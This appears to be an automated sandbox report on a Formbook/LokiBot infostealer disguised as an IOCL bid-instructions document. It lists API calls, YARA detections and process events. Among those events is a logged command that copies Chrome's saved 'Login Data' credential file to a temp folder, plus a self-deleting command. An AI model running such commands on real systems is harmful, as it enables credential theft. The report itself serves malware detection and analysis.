      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568589 NtSetInformationThread,3_2_00568589
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681A3 NtSetInformationThread,3_2_005681A3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568627 NtSetInformationThread,3_2_00568627
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005682CE NtSetInformationThread,3_2_005682CE
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056869C NtSetInformationThread,3_2_0056869C
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00560759 NtSetInformationThread,3_2_00560759
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568363 NtSetInformationThread,3_2_00568363
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056831B NtSetInformationThread,3_2_0056831B
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00561F03 NtSetInformationThread,3_2_00561F03
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568732 NtSetInformationThread,3_2_00568732
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005683FE NtSetInformationThread,3_2_005683FE
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005607E5 NtSetInformationThread,3_2_005607E5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568786 NtSetInformationThread,3_2_00568786
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005683B0 NtSetInformationThread,3_2_005683B0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00562FA5 NtSetInformationThread,LoadLibraryA,3_2_00562FA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02EA96E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA96D0 NtCreateKey,LdrInitializeThunk,16_2_02EA96D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_02EA9660
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9650 NtQueryValueKey,LdrInitializeThunk,16_2_02EA9650
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A50 NtCreateFile,LdrInitializeThunk,16_2_02EA9A50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9610 NtEnumerateValueKey,LdrInitializeThunk,16_2_02EA9610
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9FE0 NtCreateMutant,LdrInitializeThunk,16_2_02EA9FE0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9780 NtMapViewOfSection,LdrInitializeThunk,16_2_02EA9780
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9770 NtSetInformationFile,LdrInitializeThunk,16_2_02EA9770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9B00 NtSetValueKey,LdrInitializeThunk,16_2_02EA9B00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9710 NtQueryInformationToken,LdrInitializeThunk,16_2_02EA9710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_02EA9860
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9840 NtDelayExecution,LdrInitializeThunk,16_2_02EA9840
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA95D0 NtClose,LdrInitializeThunk,16_2_02EA95D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA99A0 NtCreateSection,LdrInitializeThunk,16_2_02EA99A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9560 NtWriteFile,LdrInitializeThunk,16_2_02EA9560
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9540 NtReadFile,LdrInitializeThunk,16_2_02EA9540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_02EA9910
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A80 NtOpenDirectoryObject,16_2_02EA9A80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9670 NtQueryInformationProcess,16_2_02EA9670
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A20 NtResumeThread,16_2_02EA9A20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A00 NtProtectVirtualMemory,16_2_02EA9A00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A10 NtQuerySection,16_2_02EA9A10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA97A0 NtUnmapViewOfSection,16_2_02EA97A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA3B0 NtGetContextThread,16_2_02EAA3B0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9760 NtOpenProcess,16_2_02EA9760
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA770 NtOpenThread,16_2_02EAA770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9730 NtQueryVirtualMemory,16_2_02EA9730
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA710 NtOpenProcessToken,16_2_02EAA710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA98F0 NtReadVirtualMemory,16_2_02EA98F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA98A0 NtWriteVirtualMemory,16_2_02EA98A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAB040 NtSuspendThread,16_2_02EAB040
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9820 NtEnumerateKey,16_2_02EA9820
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA95F0 NtQueryInformationFile,16_2_02EA95F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA99D0 NtCreateProcessEx,16_2_02EA99D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9950 NtQueueApcThread,16_2_02EA9950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9520 NtWaitForSingleObject,16_2_02EA9520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAAD30 NtSetContextThread,16_2_02EAAD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9CA0 NtCreateFile,16_2_006E9CA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9D50 NtReadFile,16_2_006E9D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9DD0 NtClose,16_2_006E9DD0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9E80 NtAllocateVirtualMemory,16_2_006E9E80
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E256E303_2_1E256E30
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E26EBB03_2_1E26EBB0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2F10023_2_1E2F1002
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E24B0903_2_1E24B090
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E230D203_2_1E230D20
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2541203_2_1E254120
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E23F9003_2_1E23F900
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E301D553_2_1E301D55
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00564B903_2_00564B90
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056144E3_2_0056144E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005640723_2_00564072
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00566C6D3_2_00566C6D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056601E3_2_0056601E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056103D3_2_0056103D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005638DB3_2_005638DB
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005674A53_2_005674A5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056415A3_2_0056415A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056410D3_2_0056410D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681F23_2_005681F2
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005659F83_2_005659F8
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005641B13_2_005641B1
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056424E3_2_0056424E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00561E6F3_2_00561E6F
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00566E053_2_00566E05
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056060D3_2_0056060D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005642353_2_00564235
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00565EA93_2_00565EA9
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005673563_2_00567356
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00564B173_2_00564B17
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00565F3A3_2_00565F3A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005657C53_2_005657C5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056679F3_2_0056679F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E86E3016_2_02E86E30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E9EBB016_2_02E9EBB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E7B09016_2_02E7B090
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02F2100216_2_02F21002
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E7841F16_2_02E7841F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E7D5E016_2_02E7D5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02F31D5516_2_02F31D55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E60D2016_2_02E60D20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E8412016_2_02E84120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02E6F90016_2_02E6F900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ED11016_2_006ED110
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ED9C016_2_006ED9C0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EE20116_2_006EE201
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EE55716_2_006EE557
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EE55416_2_006EE554
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006D2D9016_2_006D2D90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EDE4516_2_006EDE45
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006D9E2016_2_006D9E20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006D9E1B16_2_006D9E1B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EE7E016_2_006EE7E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006D2FB016_2_006D2FB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02E6B150 appears 32 times
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000001.00000002.268000879.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.369450389.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.372432582.000000001E32F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000000.266922837.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeBinary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.520702711.000000000336F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.514310291.00000000009AD000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/5@3/3
      Source: C:\Windows\SysWOW64\wlanext.exeFile created: C:\Users\user\AppData\Roaming\730-O-47Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4424:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeFile created: C:\Users\user~1\AppData\Local\Temp\~DFE55D899C06056F58.TMPJump to behavior
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeVirustotal: Detection: 33%
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeReversingLabs: Detection: 51%
      Source: unknownProcess created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknownProcess created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeProcess created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe' Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /VJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
